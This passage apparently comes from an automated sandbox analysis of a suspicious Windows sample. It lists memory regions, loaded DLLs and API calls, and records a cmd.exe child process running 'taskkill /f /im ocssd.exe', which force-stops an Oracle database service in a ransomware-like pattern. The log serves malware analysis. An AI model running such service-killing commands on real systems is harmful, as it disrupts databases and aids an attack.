"BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1796 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1797 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1798 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1799 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 1800 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1801 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 1802 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1803 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 1804 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 1805 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 1806 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 1807 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1808 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1809 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1810 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1811 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 1812 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1813 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 1814 start_va = 0x4190000 end_va = 0x419ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 1815 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1816 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1817 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1818 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1819 start_va = 0x4400000 end_va = 0x46cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1820 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1821 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1822 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1823 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1824 start_va = 0x4400000 end_va = 0x44bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1825 start_va = 0x45d0000 end_va = 0x46cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045d0000" filename = "" Region: id = 1826 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1827 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1828 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1829 start_va = 0x4130000 end_va = 0x416ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 1830 start_va = 0x41a0000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041a0000" filename = "" Region: id = 1831 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1832 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1833 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1834 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1835 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1836 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1837 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1838 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1839 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1840 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1841 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1842 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1843 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1844 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 1845 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 1846 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 1847 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 1848 start_va = 0x44c0000 end_va = 0x45bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 1849 start_va = 0x44c0000 end_va = 0x44e9fff monitored = 0 entry_point = 0x44c5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1850 start_va = 0x45b0000 end_va = 0x45bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 1851 start_va = 0x46d0000 end_va = 0x4857fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046d0000" filename = "" Region: id = 1852 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1853 start_va = 0x4860000 end_va = 0x49e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004860000" filename = "" Region: id = 1854 start_va = 0x49f0000 end_va = 0x5deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049f0000" filename = "" Region: id = 1855 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1856 start_va = 0x4170000 end_va = 0x4170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004170000" filename = "" Region: id = 1857 start_va = 0x4180000 end_va = 0x4184fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 1858 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 1859 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 1860 start_va = 0x5df0000 end_va = 0x6126fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1861 start_va = 0x44c0000 end_va = 0x45a9fff monitored = 0 entry_point = 0x44fd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1862 start_va = 0x44c0000 end_va = 0x44c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 1863 start_va = 0x44d0000 end_va = 0x45affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1864 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1865 start_va = 0x45c0000 end_va = 0x45c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045c0000" filename = "" Region: id = 1866 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1867 start_va = 0x6130000 end_va = 0x6130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006130000" filename = "" Region: id = 1868 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 1869 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 1870 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1871 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 1872 start_va = 0x6140000 end_va = 0x617ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006140000" filename = "" Region: id = 1873 start_va = 0x6180000 end_va = 0x61bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006180000" filename = "" Region: id = 1874 start_va = 0x61c0000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061c0000" filename = "" Region: id = 1875 start_va = 0x6200000 end_va = 0x623ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 1876 start_va = 0x6240000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006240000" filename = "" Region: id = 1877 start_va = 0x6280000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 1878 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 1879 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 1881 start_va = 0x62c0000 end_va = 0x62c5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000062c0000" filename = "" Thread: id = 155 os_tid = 0xdc8 Thread: id = 156 os_tid = 0x1314 Thread: id = 157 os_tid = 0x13d8 Thread: id = 158 os_tid = 0xcf8 Thread: id = 159 os_tid = 0x12e8 Process: id = "20" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3302b000" os_pid = "0x1304" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im ocssd.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1883 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1884 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1885 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1886 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1887 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1888 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1889 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1890 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1891 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1892 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1893 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 1894 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1895 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1896 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1897 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1898 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 1899 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1900 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 1901 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1902 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1903 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1904 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1905 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1906 start_va = 0x4a0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1907 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1908 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1909 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1910 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1911 start_va = 0x4a0000 end_va = 0x55dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1912 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1913 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1914 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1915 start_va = 0x6f0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 1916 start_va = 0x7f0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 1917 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1918 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1919 start_va = 0x8c0000 end_va = 0xbf6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 160 os_tid = 0x338 [0155.024] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0155.024] __set_app_type (_Type=0x1) [0155.024] __p__fmode () returned 0x74974d6c [0155.024] __p__commode () returned 0x74975b1c [0155.024] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0155.025] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0155.025] GetCurrentThreadId () returned 0x338 [0155.025] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x338) returned 0x78 [0155.025] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0155.025] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0155.026] SetThreadUILanguage (LangId=0x0) returned 0x409 [0155.038] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0155.038] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0155.039] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.039] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0155.039] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0155.039] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.039] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0155.039] GetConsoleOutputCP () returned 0x1b5 [0155.040] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0155.040] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0155.041] _get_osfhandle (_FileHandle=1) returned 0x158 [0155.041] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0155.041] _get_osfhandle (_FileHandle=1) returned 0x158 [0155.041] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0155.041] _get_osfhandle (_FileHandle=0) returned 0x154 [0155.041] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0155.041] GetEnvironmentStringsW () returned 0x5f7db0* [0155.041] GetProcessHeap () returned 0x5f0000 [0155.041] RtlAllocateHeap 